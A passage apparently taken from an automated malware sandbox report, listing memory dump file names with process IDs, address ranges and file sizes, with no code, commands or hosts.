                                                                                                                                                                                                                                                                                                                                                      • memory/5200-346-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5200-354-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/5204-422-0x00007FF6EE364060-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5268-347-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5268-356-0x0000000004ED0000-0x0000000004ED1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/5356-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5380-353-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5432-358-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5432-363-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        80KB

                                                                                                                                                                                                                                                                                                                                                      • memory/5476-360-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5504-381-0x0000000004D80000-0x0000000004D81000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/5504-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5576-423-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5592-396-0x000000001B190000-0x000000001B192000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                                                                                                      • memory/5592-366-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5632-368-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5668-385-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/5668-372-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5956-395-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5956-404-0x0000000004AAA000-0x0000000004BAB000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        1.0MB

                                                                                                                                                                                                                                                                                                                                                      • memory/6060-397-0x0000000000000000-mapping.dmp